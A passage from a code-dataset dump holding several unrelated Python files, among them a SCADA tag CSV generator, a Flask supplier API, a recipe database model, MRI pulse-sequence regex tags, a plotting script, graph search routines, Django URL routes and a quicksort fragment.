\"DConversion\": \"Direct\",\r\n \"AccessName\": \"HC\",\r\n \"ItemUseTagname\": \"No\",\r\n \"ItemName\": \"\",\r\n \"ReadOnly\": \"No\",\r\n \"AlarmComment\": \"\",\r\n \"AlarmAckModel\": 0,\r\n \"DSCAlarmDisable\": 0,\r\n \"DSCAlarmInhibitor\": \"\",\r\n \"SymbolicName\": \"\"\r\n }\r\n\r\n dict_data.append(my_dict)\r\n\r\n return(my_dict)\r\n\r\n\r\n\r\n def auto_pb(self):\r\n dict_data = []\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Auto_PB\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.AutoPB\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def manual_mode(self):\r\n dict_data = self.auto_pb()\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Manual_Mode\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.ManualMode\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def manual_close(self):\r\n dict_data = self.manual_mode()\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Manual_Close\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.ManualClose\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def manual_open(self):\r\n dict_data = self.manual_close()\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Manual_Open\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.ManualOpen\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def open(self):\r\n dict_data = self.manual_open()\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Open\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.Open\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def create_tags(self):\r\n dict_data = self.stat_off()\r\n\r\n return(dict_data)\r\n \r\n def create_csv(self):\r\n csv_file = \"csv-files/discrete/slide_gates_{}_{}.csv\".format(self.conveyor_type, self.line)\r\n dict_data = self.open()\r\n csv_columns = list(dict_data[0].keys())\r\n\r\n try:\r\n with open(csv_file, 'w') as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\r\n writer.writeheader()\r\n for data in dict_data:\r\n writer.writerow(data)\r\n except IOError as e:\r\n print(e)\r\n\r\nif __name__ == \"__main__\":\r\n sg = SGDiscrete(1, 5, 1, \"Distribution\", \"C\")\r\n sg.create_csv()\r\n","sub_path":"tagcreator/discrete/sg_discrete.py","file_name":"sg_discrete.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"576489497","text":"# -*- coding: utf-8 -*-\nimport os\nfrom flask import Blueprint, request, send_file\nfrom flask.ext.login import current_user\nfrom ...message import message\nfrom ...models import *\nfrom ...utils import convert_to_timestamp, jsonify, login_required, remove_if_startwith\n\nmain = Blueprint('api_main', __name__)\n\nsettings = current_app.config\n\n@main.route('/enter.jpg', methods=['GET'])\ndef first_img():\n startpage = StartPage.query.filter(StartPage.is_active == True).one()\n img_path = os.path.join(settings['STATIC_BASE_ROOT'], remove_if_startwith(startpage.image, '/static/'))\n return send_file(img_path, mimetype='image/jpeg')\n\n\n@main.route('/carousel', methods=['GET'])\ndef carousel_list():\n carousel_list1 = Carousel.query.order_by(Carousel.order_num.desc()).all()\n data = {\n 'data': [{'title': carousel.name, 'imgUrl': carousel.image} for carousel in carousel_list1]\n }\n return jsonify(data)\n\n\n@main.route('/province', methods=['GET'])\ndef province_list():\n area_list = Area.query.filter(Area.parent_id == None)\\\n .order_by(Area.order_num.desc(), Area.create_date.desc()).all()\n data = [{'id': area.id, 'name': area.name} for area in area_list]\n return jsonify(data)\n\n\n@main.route('/city', methods=['GET'])\ndef city_list():\n province_id = int(request.args['province_id'])\n area_list = Area.query.filter(Area.parent_id == province_id)\\\n .order_by(Area.order_num.desc(), Area.create_date.desc()).all()\n if not area_list:\n area = Area.query.get(province_id)\n area_list = [area]\n data = [{'id': area.id, 'name': area.name} for area in area_list]\n return jsonify(data)\n\n\n@main.route('/me', methods=['GET'])\n@login_required\ndef my_info():\n supplier = current_user.supplier\n\n winCount = Project.query.filter(Project.supplier_id==supplier.id).count()\n data = {\n 'imgUrl': '',\n 'companyName': supplier.company_name,\n 'mail': supplier.email,\n 'authenticated': supplier.status,\n 'mark': supplier.service_score,\n 'bidCount': len(supplier.bids),\n 'winCount': winCount,\n 'id': supplier.id,\n }\n return jsonify(data)\n\n\n@main.route('/comment', methods=['GET'])\n@login_required\ndef my_comment():\n supplier = current_user.supplier\n\n comment_list = supplier.comments\n data = [\n {\n 'id': comment.id,\n 'readFlag': comment.is_read,\n 'title': '',\n 'content': comment.content,\n 'mark': comment.service_score,\n 'commentNum': 0\n }\n for comment in comment_list\n ]\n return jsonify(data)\n\n\n@main.route('/comment/', methods=['GET'])\ndef comment_info(comment_id):\n comment = Comment.query.get(comment_id)\n\n data = {\n 'title': '',\n 'content': comment.content,\n 'serviceMark': comment.service_score,\n 'costMark': comment.cost_score,\n 'quantityMark': comment.quality_score,\n 'timeMark': comment.time_score,\n 'comments': [],\n }\n return jsonify(data)\n\n\n@main.route('/comment/', methods=['POST'])\n@catch_db_error\n@login_required\ndef comment_appeal(comment_id):\n appeal = request.form['content']\n\n comment = Comment.query.get(comment_id)\n comment.appeal = appeal\n db.session.commit()\n\n return jsonify(message.ok(u'申诉提交成功'))\n\n\n@main.route('/bid', methods=['GET'])\n@login_required\ndef bid_list():\n type = request.args['type'].strip()\n start = int(request.args['start'])\n\n supplier = current_user.supplier\n\n if type == 'bid':\n bid_list1 = Bid.query.filter(Bid.supplier_id == supplier.id).order_by(Bid.create_date.desc()) \\\n .offset(start).limit(10).all()\n elif type == 'win':\n bid_list1 = Bid.query.join(Project).filter(Bid.supplier_id == supplier.id, Bid.id == Project.bid_id) \\\n .order_by(Bid.create_date.desc()).offset(start).limit(10).all()\n else:\n return jsonify(message.error(u'类型不正确'))\n\n data = []\n for bid in bid_list1:\n project = bid.project\n data.append(\n {\n 'type': project.business_scope.name,\n 'imgUrl': project.building.logo,\n 'title': project.name,\n 'subTitle': project.building.name,\n 'state': project.status.get_display_name(),\n 'from': convert_to_timestamp(project.lead_start_date),\n 'to': convert_to_timestamp(project.lead_end_date),\n 'publishTime': convert_to_timestamp(project.publish_date),\n 'deadline': convert_to_timestamp(project.due_date),\n 'id': project.id,\n 'price': project.price_range.get_display_name(),\n }\n )\n return jsonify(data)\n\n\n@main.route('/enterInfoValidated', methods=['GET'])\n@login_required\ndef check_supplier_status():\n supplier = current_user.supplier\n\n result = supplier.status == Supplier.STATUS_PASS\n return jsonify(result)\n\n\n@main.route('/project_supplier', methods=['GET'])\ndef project_supplier():\n project_id = int(request.args['project_id'])\n\n project = Project.query.get(project_id)\n if not project:\n return jsonify(message.error(u'项目不存在'))\n\n if not project.supplier_id:\n return jsonify(message.error(u'供应商不存在'))\n\n supplier = Supplier.query.get(project.supplier_id)\n data = {\n 'companyName': supplier.company_name,\n 'contactName': supplier.company_contact,\n 'tel': supplier.company_contact_telephone,\n 'position': supplier.area and supplier.area.full_name,\n 'addrSpec': supplier.company_address,\n 'bank': supplier.deposit_bank,\n 'account': supplier.bank_account,\n }\n return jsonify(data)\n","sub_path":"yuanyang/views/api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"606139492","text":"from DataConnection import DataConnection\r\nimport Utilities\r\nimport Ingredient\r\nfrom Amount_Units import Amount_Units\r\nfrom sys import exc_info\r\n\r\nclass Recipe:\r\n recipeTable = \"Recipe\"\r\n recipeElementTable = \"Recipe_Element\"\r\n recipeIdColumn = \"Recipe_ID\"\r\n recipeNameColumn = \"Recipe_Name\"\r\n recipeDescriptionColumn = \"Description\"\r\n amountNameColumn = \"Amount\" \r\n \r\n typeTable = \"Type\"\r\n typeIdColumn = \"Type_ID\"\r\n typeNameColumn = \"Type\"\r\n cookbookTypeIdColumn = \"Cookbook_Type_ID\"\r\n isCookbookColumn = \"isCookbook\"\r\n \r\n isNotCookbook = 0\r\n isCookbook = 1\r\n \r\n mainTypeId = 1\r\n sideTypeId = 2\r\n otherTypeId = 3\r\n \r\n sideALabelPrefix = \"side_A_\"\r\n sideBLabelPrefix = \"side_B_\" \r\n \r\n whereTypeId =\"{0} JOIN {5} ON {0}.{1} = {5}.{1} WHERE {5}.{3} = {4} AND ({0}.{1} = {2} OR {0}.{1} = \".format(recipeTable, typeIdColumn, otherTypeId, isCookbookColumn, isNotCookbook, typeTable)\r\n whereMainTypeId = \"{} {})\".format(whereTypeId, str(mainTypeId))\r\n whereSideTypeId = \"{} {})\".format(whereTypeId, str(sideTypeId))\r\n\r\n def __init__(self, recipeId, recipeName, recipeType, cookbookType, ingredients, description):\r\n self.recipeId = recipeId\r\n self.recipeName = Utilities.normalizeCasing(recipeName)\r\n self.recipeType = recipeType\r\n self.cookbookType = cookbookType\r\n self.ingredients = ingredients\r\n self.description = description\r\n\r\n @classmethod\r\n def createNewRecipe(cls, recipeName, recipeType, cookbookType, ingredients, description): \r\n recipeId = Utilities.generateNewKey(Recipe.recipeIdColumn, Recipe.recipeTable)\r\n \r\n return Recipe(recipeId, recipeName, recipeType, cookbookType, ingredients, description)\r\n \r\n @classmethod\r\n def getExistingRecipe(cls, recipeId, recipeName):\r\n if recipeId:\r\n known = recipeId\r\n select = Recipe.recipeNameColumn\r\n where = Recipe.recipeIdColumn\r\n whereIsId = True\r\n elif recipeName:\r\n known = recipeName\r\n select = Recipe.recipeIdColumn\r\n where = Recipe.recipeNameColumn\r\n whereIsId = False\r\n \r\n recipeInfo = Utilities.getKnownInfo(known, select, where, Recipe.recipeTable, whereIsId)\r\n recipeType = Utilities.getKnownInfo(Utilities.getKnownInfo(known, Recipe.typeIdColumn, where, Recipe.recipeTable, whereIsId), Recipe.typeNameColumn, Recipe.typeIdColumn, Recipe.typeTable, True)\r\n \r\n try:\r\n cookbookType = Utilities.getKnownInfo(Utilities.getKnownInfo(known, Recipe.cookbookTypeIdColumn, where, Recipe.recipeTable, whereIsId), Recipe.typeNameColumn, Recipe.typeIdColumn, Recipe.typeTable, True)\r\n except:\r\n cookbookType = \"None\"\r\n \r\n description = Utilities.getKnownInfo(known, Recipe.recipeDescriptionColumn, where, Recipe.recipeTable, whereIsId)\r\n if description == None: description = \"\"\r\n \r\n if recipeId: \r\n ingredients = Ingredient.Ingredient.getRecipeIngredients(recipeId)\r\n return Recipe(recipeId, recipeInfo, recipeType, cookbookType, ingredients, description)\r\n elif recipeName:\r\n ingredients = Ingredient.Ingredient.getRecipeIngredients(recipeInfo)\r\n return Recipe(recipeInfo, recipeName, recipeType, cookbookType, ingredients, description)\r\n\r\n def add(self):\r\n connection = DataConnection()\r\n \r\n recipeQuery = \"INSERT INTO {} ({}, {}, {}, {}, {}) VALUES (%s, %s, %s, %s, %s);\".format(Recipe.recipeTable, Recipe.recipeIdColumn, Recipe.recipeNameColumn, Recipe.typeIdColumn, Recipe.cookbookTypeIdColumn, Recipe.recipeDescriptionColumn)\r\n recipeInsertValues = (self.recipeId, self.recipeName, Utilities.getKnownInfo(self.recipeType, self.typeIdColumn, self.typeNameColumn, self.typeTable, False), Utilities.getKnownInfo(self.cookbookType, self.typeIdColumn, self.typeNameColumn, self.typeTable, False), self.description)\r\n connection.updateData(recipeQuery, recipeInsertValues)\r\n \r\n self.insertIngredients(connection, returnQueryOnly=False)\r\n #for ingredient in self.ingredients:\r\n #ingredientId = Utilities.getKnownInfo(ingredient['name'], Ingredient.Ingredient.ingredientIdColumn, Ingredient.Ingredient.ingredientNameColumn, Ingredient.Ingredient.ingredientTable, False)\r\n #amount = ingredient['amount']\r\n #amountUnitId = Utilities.getKnownInfo(ingredient['units'], Amount_Units.unitIdColumn, Amount_Units.unitNameColumn, Amount_Units.amountUnitsTable, False)\r\n \r\n #bridgeQuery = \"INSERT INTO {} ({}, {}, {}, {}) VALUES (%s, %s, %s, %s); \".format(Recipe.recipeElementTable, Recipe.recipeIdColumn, Ingredient.Ingredient.ingredientIdColumn, Recipe.amountNameColumn, Amount_Units.unitIdColumn)\r\n #bridgeInsertValues = (self.recipeId, ingredientId, amount, amountUnitId) \r\n #connection.updateData(bridgeQuery, bridgeInsertValues)\r\n \r\n connection.closeConnection()\r\n print(\"Successfully added \" + \"'\" + self.recipeName + \"' \" + \"recipe.\")\r\n \r\n def update(self, newRecipeName, newRecipeType, newCookbookType, newIngredientsList, newDescription, updateIngredients = True):\r\n queryList = []\r\n insertValues = []\r\n updateStatus = False\r\n \r\n if self.recipeName != newRecipeName:\r\n self.recipeName = newRecipeName\r\n queryList.append(\"UPDATE {} SET {} = %s WHERE {} = {};\".format(Recipe.recipeTable, Recipe.recipeNameColumn, Recipe.recipeIdColumn, self.recipeId))\r\n insertValues.append((self.recipeName,))\r\n if self.recipeType != newRecipeType:\r\n self.recipeType = newRecipeType\r\n queryList.append(\"UPDATE {} SET {} = %s WHERE {} = {};\".format(Recipe.recipeTable, Recipe.typeIdColumn, Recipe.recipeIdColumn, self.recipeId))\r\n insertValues.append((Utilities.getKnownInfo(self.recipeType, Recipe.typeIdColumn, Recipe.typeNameColumn, Recipe.typeTable, False),))\r\n if self.cookbookType != newCookbookType:\r\n self.cookbookType = newCookbookType\r\n queryList.append(\"UPDATE {} SET {} = %s WHERE {} = {};\".format(Recipe.recipeTable, Recipe.cookbookTypeIdColumn, Recipe.recipeIdColumn, self.recipeId))\r\n insertValues.append((Utilities.getKnownInfo(self.cookbookType, Recipe.typeIdColumn, Recipe.typeNameColumn, Recipe.typeTable, False),))\r\n if self.description != newDescription:\r\n self.description = newDescription\r\n \r\n if newDescription is not None:\r\n queryList.append(\"UPDATE {} SET {} = %s WHERE {} = {};\".format(Recipe.recipeTable, Recipe.recipeDescriptionColumn, Recipe.recipeIdColumn, self.recipeId))\r\n insertValues.append((self.description,))\r\n if updateIngredients:\r\n self.ingredients = newIngredientsList\r\n ingredientsQueryList, ingredientInsertValues = self.insertIngredients(None, returnQueryOnly=True)\r\n queryList.append(\"DELETE FROM {} WHERE {} = %s;\".format(Recipe.recipeElementTable, Recipe.recipeIdColumn))\r\n insertValues.append((self.recipeId,))\r\n \r\n for count in range(len(ingredientsQueryList)):\r\n queryList.append(ingredientsQueryList[count])\r\n insertValues.append(ingredientInsertValues[count])\r\n \r\n try:\r\n for element in range(len(queryList)):\r\n query = queryList[element]\r\n values = insertValues[element]\r\n \r\n connection = DataConnection()\r\n connection.updateData(query, values)\r\n connection.closeConnection()\r\n \r\n updateStatus = True\r\n except:\r\n updateStatus = exc_info()\r\n\r\n return updateStatus\r\n \r\n def delete(self):\r\n recipeElementQuery = \"DELETE FROM {} WHERE {} = %s;\".format(Recipe.recipeElementTable, Recipe.recipeIdColumn)\r\n recipeQuery = \"DELETE FROM {} WHERE {} = %s;\".format(Recipe.recipeTable, Recipe.recipeIdColumn)\r\n bindValue = (self.recipeId,)\r\n \r\n try:\r\n connection = DataConnection()\r\n connection.updateData(recipeElementQuery, bindValue)\r\n connection.updateData(recipeQuery, bindValue)\r\n connection.closeConnection()\r\n \r\n return True\r\n except:\r\n return exc_info()\r\n \r\n def insertIngredients(self, connectionInstance, returnQueryOnly = False):\r\n bridgeQueryList = []\r\n bridgeInsertTupleList = []\r\n \r\n for ingredient in self.ingredients:\r\n ingredientId = Utilities.getKnownInfo(ingredient['name'], Ingredient.Ingredient.ingredientIdColumn, Ingredient.Ingredient.ingredientNameColumn, Ingredient.Ingredient.ingredientTable, False)\r\n amount = ingredient['amount']\r\n amountUnitId = Utilities.getKnownInfo(ingredient['units'], Amount_Units.unitIdColumn, Amount_Units.unitNameColumn, Amount_Units.amountUnitsTable, False)\r\n \r\n bridgeQuery = \"INSERT INTO {} ({}, {}, {}, {}) VALUES (%s, %s, %s, %s); \".format(Recipe.recipeElementTable, Recipe.recipeIdColumn, Ingredient.Ingredient.ingredientIdColumn, Recipe.amountNameColumn, Amount_Units.unitIdColumn)\r\n bridgeInsertValues = (self.recipeId, ingredientId, amount, amountUnitId)\r\n if not returnQueryOnly:\r\n connectionInstance.updateData(bridgeQuery, bridgeInsertValues)\r\n else:\r\n bridgeQueryList.append(bridgeQuery)\r\n bridgeInsertTupleList.append((bridgeInsertValues))\r\n \r\n if returnQueryOnly:\r\n return bridgeQueryList, bridgeInsertTupleList\r\n\r\n def __str__(self):\r\n newLine = \"\\n\"\r\n tab = \" \" \r\n \r\n message = \"--- Summary ---\" + newLine\r\n message += \"Recipe name: \" + self.recipeName + newLine\r\n message += \"Recipe type: \" + str(self.recipeType) + newLine\r\n message += \"Cookbook type: \" + str(self.cookbookType) + newLine\r\n \r\n if self.ingredients:\r\n message += \"Ingredients: \" + newLine\r\n for ingredient in self.ingredients:\r\n message += \"{} {} {} {} {}\".format(tab, ingredient['amount'], ingredient['units'], ingredient['name'], newLine)\r\n else:\r\n message += \"Ingredients: None\" + newLine\r\n \r\n message += \"Description: \" + str(self.description)\r\n\r\n return message","sub_path":"RecipeModel.py","file_name":"RecipeModel.py","file_ext":"py","file_size_in_byte":10633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"68363477","text":"cat = 'tool'\n\n# Import base\nfrom base import *\n\n# Check spiral\npriptn_spiral = [\n 'spiral',\n]\nsecptn_spiral = [\n 'mri',\n 'bold',\n 'imag',\n 'scan',\n 'data',\n 'pulse',\n 'acqui',\n 'sequence',\n]\ndef checkspiral(txt, **conargs):\n return contextsearch(txt, priptn_spiral, secptn_spiral, ichar='.', **conargs)\n\n\ntags = {}\n\n# Structural\ntags['mprage'] = [\n '\\Wmp%srage\\W' % (delimptn),\n]\n\ntags['spgr'] = [\n '\\Wspgr\\W',\n]\n\n# Trajectory\ntags['epi'] = [\n 'echo%splanar' % (delimptn),\n re.compile('EPI'),\n]\n\ntags['spiral'] = [\n 'spiral%sin\\W' % (delimptn),\n 'spiral%sout\\W' % (delimptn),\n checkspiral,\n]\n\n# Sequence\ntags['gradient'] = [\n 'gradient%secho' % (delimptn),\n 'gradient%srecall(?:ed)?' % (delimptn),\n]\n\ntags['spin'] = [\n 'spin%secho' % (delimptn),\n]\n\ntags['grase'] = [\n re.compile('GRASE'),\n]\n\n# Acceleration method\ntags['sense'] = [\n re.compile('SENSE'),\n 'sensitivity%sencoded' % (delimptn),\n]\n\ntags['grappa'] = [\n re.compile('GRAPPA'),\n]\n\ntags['presto'] = [\n re.compile('PRESTO'),\n]\n\ntags['smash'] = [\n re.compile('SMASH'),\n]\n","sub_path":"neurotrends/pattern/pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"64534298","text":"import numpy as np\nimport time\nimport sys\nimport matplotlib.pyplot as plt\nimport math\n\nstart_time = time.time()\n\n# set up parameters \ndata_root_path = \"/home/dc-bamb1/GRChombo/Analysis/data/Y00_integration_data/\"\nfile_names = {}\na_list = [\"0\", \"0.99\"]\nfile_names[\"0\"] = \"run0067_KNL_l0_m0_a0_Al0_mu1_M1_KerrSchild\"\nfile_names[\"0.99\"] = \"run0068_KNL_l0_m0_a0.99_Al0_mu1_M1_KerrSchild\"\nnumber = 1250\nmu = 1\nM = 1\nlin_or_log = False\nrho_colours = [\"r-\", \"g--\"]\nJ_colours = [\"b-\", \"b--\"]\ntime = 0\n\n### get data and plot profile for each a and each lm\n\nscale = \"\"\nif (lin_or_log):\n\tscale = \"linear\"\nelse:\n\tscale = \"log\"\n\nfig, ax1 = plt.subplots()\nax2 = ax1.twinx()\nfor i in range(0, len(a_list)):\n\ta = float(a_list[i])\n\tr_plus = M*(1 + math.sqrt(1 - a**2))\n\tfile_name = file_names[a_list[i]] + \"_{:s}_{:s}_n{:06d}.dat\"\n\tdataset_path = data_root_path + file_name\n\t# generate rho data\n\tdata = np.genfromtxt(dataset_path.format(\"rho\", scale, number), skip_header=1)\n\ttime = data[1, 0]\n\tr = data[0,1:]/M\n\trho = data[1, 1:]\n\tif (lin_or_log):\n \tx = r\n\telse:\n\t \tx = np.log10(r)\n\t# generate S_azimuth data\t\n\tdata = np.genfromtxt(dataset_path.format(\"J_azimuth\", \"linear\", number), skip_header=1)\n\tS_azimuth = data[1, 1:]\t\t\n\t# plot rho\n\tax1.plot(x, np.log10(rho), rho_colours[i], label=\"$\\\\ln(\\\\rho_E)$ l=m=0 a={:.2f}\".format(a))\n\t# plot S_azimuth\n\tax2.plot(x, S_azimuth, J_colours[i], label=\"$\\\\rho_J$ l=m=0 a={:.2f}\".format(a))\n\t#\nax1.legend(fontsize=8, loc=\"upper left\")\nax2.legend(fontsize=8, loc=\"upper right\")\nax2.set_ylabel(\"$\\\\rho_J$\")\nax1.set_ylabel(\"$\\\\ln(\\\\rho_E)$\")\nif (lin_or_log):\n\txlabel_ = \"$r_{KS}/M$\"\nelse:\n\txlabel_ = \"$\\\\log_{10}(r_{KS}/M)$\"\nax1.set_xlabel(xlabel_)\ndt = 0.5\nax2.set_ylim((-10**-6, 10**-6))\na_max = np.max([float(a_str) for a_str in a_list])\nr_plus_min = 1 + np.sqrt(1 - a_max**2)\nprint(\"r_plus_min = \", r_plus_min)\nif (lin_or_log) :\n\tplt.xlim((1.0, 100))\nelse :\n\tplt.xlim(left=np.log10(r_plus_min))\ntitle = \"$\\\\rho_E$ and $\\\\rho_J$ profile KerrSchild M=1 $\\\\mu$={:.1f}, time = {:.1f}\".format(mu, time) \nplt.title(title)\nplt.legend(fontsize=8)\nplt.tight_layout()\nsave_name = \"/home/dc-bamb1/GRChombo/Analysis/plots/KerrSchild_M{:.1f}_mu{:.1f}_l0_m0_rho_S_azimuth_{:s}_t={:.1f}_plot.png\".format(M, mu, scale, time)\nprint(\"saved \" + save_name)\nplt.savefig(save_name, transparent=False)\nplt.clf()\n","sub_path":"Analysis/scripts/old_scripts/plot_radial_profile_rho_S_azimuth_KS.py","file_name":"plot_radial_profile_rho_S_azimuth_KS.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"89355949","text":"from queue import PriorityQueue, Queue, LifoQueue\n\nfrom node import expand_node\n\n\ndef a_star(root, heuristic_fn, cost_fn):\n fringe = PriorityQueue()\n fringe.put((cost_fn(root) + heuristic_fn(root), root))\n visited = []\n nodes_examined = 0\n while not fringe.empty():\n cost, node = fringe.get()\n\n nodes_examined += 1\n\n if node.goal_test():\n # this is a solution.\n return node, nodes_examined\n\n for successor in node.successors():\n # print(\"added successor!\")\n if node in visited:\n continue\n else:\n visited.append(node)\n fringe.put(\n (cost_fn(successor) + heuristic_fn(successor), successor))\n\n return None, nodes_examined\n\n\ndef BFS(root, node_count_max=None):\n node_num = 0\n fringe = Queue()\n\n # put the root on the fringe\n fringe.put(root)\n\n # in BFS, we treat the fringe as a FIFO queue\n while not fringe.empty() and node_num < node_count_max:\n node = fringe.get()\n node_num += 1\n print(\"Examining Node #%d: %s\" % (node_num, node))\n for child in node.successors():\n node.register_child(child)\n fringe.put(child)\n if node.goal_test():\n return node, node_num\n return None, node_num\n\n\ndef DFS(root, node_count_max=None):\n node_num = 0\n fringe = LifoQueue()\n\n # put the root on the fringe\n fringe.put(root)\n\n # in DFS, we treat the fringe as a LIFO queue\n while not fringe.empty() and node_num < node_count_max:\n node = fringe.get()\n node_num += 1\n print(\"Examining Node #%d: %s\" % (node_num, node))\n for child in node.children:\n fringe.put(child)\n if node.goal_test():\n return node, node_num\n return None, node_num\n","sub_path":"AI/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23415558","text":"\"\"\"controlinv URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n#from jet.dashboard.dashboard_modules import yandex_metrika_views\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls.static import static\n\nimport debug_toolbar\n\nfrom django.conf import settings\nfrom empresa.admin import SucursalAdmin, Grupo_EmpresarialAdmin, AreasAdmin\nfrom articulos.admin import ArticulosAdmin, PresentacionArticulosAdmin, MarcaArticulosAdmin\n#from articulos.views import vista_presentaciones\nfrom articulos.views import PresentacionesListView, PresentacionesCreate\nfrom recetas.admin import RecetasAdmin, EspecificacionesAdmin, CategoriasAdmin\n\nurlpatterns = [ \n path('admin/', admin.site.urls), \n path('__debug__/', include(debug_toolbar.urls)), \n #path('jet/', include('jet.urls', 'jet')), # Django JET URLS\n #path('jet/dashboard/', include('jet.dashboard.urls', 'jet-dashboard')),\n path('grappelli/', include('grappelli.urls')), # grappelli URLS\n path('nested_admin/', include('nested_admin.urls')),\n #path('admin_tools/', include('admin_tools.urls')),\n path('empresa/', SucursalAdmin.llenar_combo_empresas, name='llenar_combo_empresas'),\n path('empresa/municipios/', Grupo_EmpresarialAdmin.llenar_combo_municipios, name='llenar_combo_municipios') ,\n path('empresa/localidades/', Grupo_EmpresarialAdmin.llenar_combo_localidades, name='llenar_combo_localidades') ,\n path('empresa/sucursales/', AreasAdmin.llenar_combo_sucursales, name='llenar_combo_sucursales') ,\n path('empresa/areas/', AreasAdmin.llenar_combo_areas, name='llenar_combo_areas') ,\n path('articulos/subfamilias/', ArticulosAdmin.llenar_combo_subfamilias, name='llenar_combo_subfamilias') ,\n path('articulos/presentaciones//', PresentacionesListView.as_view(), name='presentaciones'),\n path('articulos/presentaciones/crear/', PresentacionesCreate.as_view(), name='crear_presentaciones'),\n path('articulos/presentaciones/', PresentacionArticulosAdmin.obtener_datos_articulo, name='obtener_datos_articulo') ,\n path('articulos/marcas/', MarcaArticulosAdmin.obtener_datos_articulo_marca, name='obtener_datos_articulo_marca') ,\n path('articulos/prefijo_subfamilias/', ArticulosAdmin.obtener_prefijo_subfamilia, name='obtener_prefijo_subfamilia') ,\n path('articulos/marcas_art/', MarcaArticulosAdmin.valida_marca_no_existente, name='valida_marca_no_existente') ,\n path('articulos/recetas/', RecetasAdmin.obtener_datos_receta, name='obtener_datos_receta') ,\n path('articulos/ingredientes/', RecetasAdmin.obtener_unidad_medida_ingrediente, name='obtener_unidad_medida_ingrediente') ,\n\n path('articulos/ingredientes_elemento/', EspecificacionesAdmin.obtener_ingredientes_elemento, name='obtener_ingredientes_elemento') ,\n\n path('recetas/categorias_menu/', CategoriasAdmin.filtra_categorias_menu, name='filtra_categorias_menu') ,\n\n\n]\n#path('articulos/presentacion_articulos/(?P\\d+)/$', vista_presentaciones, name='presentaciones_articulo'),\n# Para ver las imágenes en el debug\nif settings.DEBUG == True: \n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nadmin.site.site_header = \"Administrador del sistema\"\nadmin.site.site_title = \"Portal de Administración\"\nadmin.site.index_title = \"Bienvenido al Portal de Administrador\"","sub_path":"controlinv/controlinv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"22093339","text":"#!/usr/bin/python\n\n\nclass Quicksort(object):\n\n\tdef __init__(self,arreglo):\n\t\tself.arreglo = arreglo\n\n\tdef ordena(self):\n\t\tlast = (len(self.arreglo)-1) \n\t\tself.quicksort(self.arreglo, 0, last )\n\n\tdef quicksort(self,arreglo,first,last):\n\t\tif (first >= last): \n\t\t\treturn\n\n\t\tpivoteIndex = int((first + last) / 2)\n\t\tpivote = arreglo[pivoteIndex]\n\t\tprint(\"first = %s last = %s\",first,last)\n\t\tprint(\"pivoteIndex = %s valor pivote = %s\",pivoteIndex,pivote)\n\t\tprint(\"arreglo inicio = %s\",arreglo)\n\t\ti = first\n\t\tj = last\n\n\t\twhile i pivote:\n\t\t\t\tj -= 1\n\n\t\t\tif i < j :\n\t\t\t\tprint(\"intercambiando %s con %s\",i,j)\n\t\t\t\tx = arreglo[i]\n\t\t\t\tarreglo[i] = arreglo[j]\n\t\t\t\tarreglo[j] = 